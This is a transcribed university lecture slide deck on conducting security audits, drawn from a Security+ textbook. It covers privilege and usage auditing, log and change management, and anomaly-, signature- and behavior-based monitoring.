10-conducting security audits. privilege auditing person’s access level over an object – user...
TRANSCRIPT
![Page 1: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/1.jpg)
10-Conducting Security Audits
Dr. John P. AbrahamProfessor
UTPA
![Page 2: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/2.jpg)
Privilege Auditing
• Person’s access level over an object– User should be given minimal amount of privilege
necessary to perform his function.• Privilege management– Process of assigning and revoking privileges– Assign based on mandatory access control (MAC),
Discretionary Access Control (DAC), Role Based Access Control (RBAC) or Rule based Access Control (RBAC) – see Ch 7
![Page 3: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/3.jpg)
Auditing System Security Settings
• Regular review of user access rights, using group policies, and implementing storage and retention policies. See a policy on page4 335, figure 10-1. Next slide.
![Page 4: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/4.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition 4
![Page 5: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/5.jpg)
Group policies
• Create a configuration baseline. You can deploy this using group policies. Review these policies regularly.
![Page 6: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/6.jpg)
Storage and retention policies
• There are laws governing these
![Page 7: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/7.jpg)
![Page 8: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/8.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition
Auditing System Security Settings (continued)
• Storage and retention policies– Information lifecycle management (ILM)• A set of strategies for administering, maintaining, and
managing computer storage systems in order to retain data
– ILM strategies are typically recorded in storage and retention policies • Which outline the requirements for data storage
• Data classification– Assigns a level of business importance, availability,
sensitivity, security and regulation requirements to data
8
![Page 9: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/9.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition
Auditing System Security Settings (continued)
9
![Page 10: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/10.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition
Auditing System Security Settings (continued)
• Grouping data into categories often requires the assistance of the users who save and retrieve the data on a regular basis
• The next step is to assign the data to different levels or “tiers” of storage and accessibility
10
![Page 11: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/11.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition
Usage Auditing
• Usage auditing– Audits what objects a user has actually accessed– Involves an examination of which subjects are
accessing specific objects and how frequently• Sometimes access privileges can be very
complex• Usage auditing can help reveal incorrect
permissions• Inheritance– Permissions given to a higher level “parent” will
also be inherited by a lower level “child”• Inheritance becomes more complicated with
GPOs
11
![Page 12: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/12.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition
Usage Auditing (continued)
12
![Page 13: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/13.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition
Usage Auditing (continued)
• GPO inheritance– Allows administrators to set a base security policy
that applies to all users in the Microsoft AD• Other administrators can apply more specific
policies at a lower level– That apply only to subsets of users or computers
• GPOs that are inherited from parent containers are processed first– Followed by the order that policies were linked to
a container object 13
![Page 14: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/14.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition
Usage Auditing (continued)
• A log is a record of events that occur• Logs are composed of log entries– Each entry contains information related to a
specific event that has occurred• Logs have been used primarily for
troubleshooting problems• Log management– The process for generating, transmitting, storing,
analyzing, and disposing of computer security log data 14
![Page 15: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/15.jpg)
Usage Auditing (continued)• Security application logs– Antivirus software– Remote Access Software– Automated patch update service
• Security hardware logs– Network intrusion detection systems and host
and network intrusion prevention systems– Domain Name System (DNS)– Authentication servers– Proxy servers– Firewalls
Security+ Guide to Network Security Fundamentals 15
![Page 16: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/16.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition 16
![Page 17: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/17.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition 17
Usage Auditing (continued)
![Page 18: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/18.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition 18
Usage Auditing (continued)
![Page 19: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/19.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition
Usage Auditing (continued)
• Types of items that should be examined in a firewall log include:– IP addresses that are being rejected and dropped– Probes to ports that have no application services
running on them– Source-routed packets– Suspicious outbound connections– Unsuccessful logins
19
![Page 20: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/20.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition 20
Usage Auditing (continued)
![Page 21: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/21.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition
Usage Auditing (continued)
• Operating system logs– Event• An occurrence within a software system that is
communicated to users or other programs outside the operating system
– System events• Operational actions that are performed by the
operating system
21
![Page 22: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/22.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition
Usage Auditing (continued)
• System events that are commonly recorded include:– Client requests and server responses– Usage information
• Logs based on audit records– The second common type of security-related
operating system logs• Audit records that are commonly recorded
include:– Account information– Operational information
22
![Page 23: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/23.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition 23
![Page 24: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/24.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition
Usage Auditing (continued)
• Log management benefits:– A routine review and analysis of logs helps to
identify security incidents, policy violations, fraudulent activity, and operational problems shortly after they have occurred
– Logs can also be used in providing information for resolving such problems
– Logs may be useful for performing auditing analysis, supporting the organization’s internal investigations, and identifying operational trends and long-term problems 24
![Page 25: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/25.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition 25
![Page 26: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/26.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition
Usage Auditing (continued)
• It is recommended that organizations enact the following log management solutions:– Enact periodic audits– Establish policies and procedures for log
management– Maintain a secure log management infrastructure– Prioritize log management throughout the
organization– Use log aggregators– Provide adequate support 26
![Page 27: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/27.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition
Usage Auditing (continued)
• Change management– Refers to a methodology for making changes and
keeping track of those changes, often manually– Seeks to approach changes systematically and
provide the necessary documentation of the changes
• Two major types of changes regarding security that are routinely documented– Any change in system architecture– Data classification 27
![Page 28: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/28.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition
Usage Auditing (continued)
• Change management team (CMT)– Created to oversee changes– Any proposed change must first be approved by
the CMT• The team might be typically composed of: – Representatives from all areas of IT (servers,
network, enterprise server, etc.)– Network security– Upper-level management
28
![Page 29: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/29.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition
Usage Auditing (continued)
• The duties of the CMT include:– Review proposed changes– Ensure that the risk and impact of the planned
change is clearly understood– Recommend approval, disapproval, deferral, or
withdrawal of a requested change– Communicate proposed and approved changes to
co-workers
29
![Page 30: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/30.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition
Monitoring Methodologies and Tools
• There are several types of instruments that can be used on systems and networks to detect security-related anomalies
30
![Page 31: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/31.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition
Methodologies for Monitoring
• Anomaly-based monitoring– Designed for detecting statistical anomalies– Baseline• A reference set of data against which operational data
is compared
– Whenever there is a significant deviation from this baseline, an alarm is raised
• Advantage– Detect the anomalies quickly
31
![Page 32: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/32.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition
Methodologies for Monitoring (continued)
• False positives– Alarms that are raised when there is no actual
abnormal behavior• Normal behavior can change easily and even
quickly– Anomaly-based monitoring is subject to false
positives
32
![Page 33: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/33.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition
Methodologies for Monitoring (continued)
• Signature-based monitoring– Compares activities against a predefined signature– Requires access to an updated database of
signatures• Along with a means to actively compare and match
current behavior against a collection of signatures
• Weaknesses– The signature databases must be constantly
updated– As the number of signatures grows the behaviors
must be compared against an increasingly large number of signatures
33
![Page 34: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/34.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition
Methodologies for Monitoring (continued)
• Behavior-based monitoring– Designed to be more adaptive and proactive
instead of reactive– Uses the “normal” processes and actions as the
standard– Continuously analyzes the behavior of processes
and programs on a system• Alerts the user if it detects any abnormal actions
• Advantage– Not necessary to update signature files or compile
a baseline of statistical behavior34
![Page 35: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/35.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition
Methodologies for Monitoring (continued)
35
![Page 36: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/36.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition
Monitoring Tools
• Performance baselines and monitors– Performance baseline• A reference set of data established to create the
“norm” of performance for a system or systems
– Data is accumulated through the normal operations of the systems and networks through performance monitors
– Operational data is compared with the baseline data to determine how closely the norm is being met and if any adjustments need to be made
36
![Page 37: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/37.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition
Monitoring Tools (continued)
• System monitor– A low-level system program that uses a
notification engine designed to monitor and track down hidden activity on a desktop system, server, or even personal digital assistant (PDA) or cell phone
• Some system monitors have a Web-based interface
• System monitors generally have a fully customizable notification system– That lets the owner design the information that is
collected and made available
37
![Page 38: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/38.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition
Monitoring Tools (continued)
• Protocol analyzer– Also called a sniffer– Captures each packet to decode and analyze its
contents– Can fully decode application-layer network
protocols– The different parts of the protocol can be analyzed
for any suspicious behavior
38
![Page 39: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/39.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition
Summary
• A “privilege” can be considered a subject’s access level over an object
• Auditing system security settings for user privileges involves a regular review of user access and rights
• Information lifecycle management (ILM) is a set of strategies for administering, maintaining, and managing computer storage systems in order to retain data
• Usage auditing involves an examination of which subjects are accessing specific objects and how frequently
39
![Page 40: 10-Conducting Security Audits. Privilege Auditing Person’s access level over an object – User should be given minimal amount of privilege necessary to](https://reader036.vdocuments.us/reader036/viewer/2022062516/56649ddd5503460f94ad4e84/html5/thumbnails/40.jpg)
Security+ Guide to Network Security Fundamentals, Third Edition
Summary (continued)
• Logs related to computer security have become particularly important
• Change management refers to a methodology for making changes and keeping track of those changes, often manually
• Monitoring involves examining network traffic, activity, transactions, or behavior in order to detect security-related anomalies
40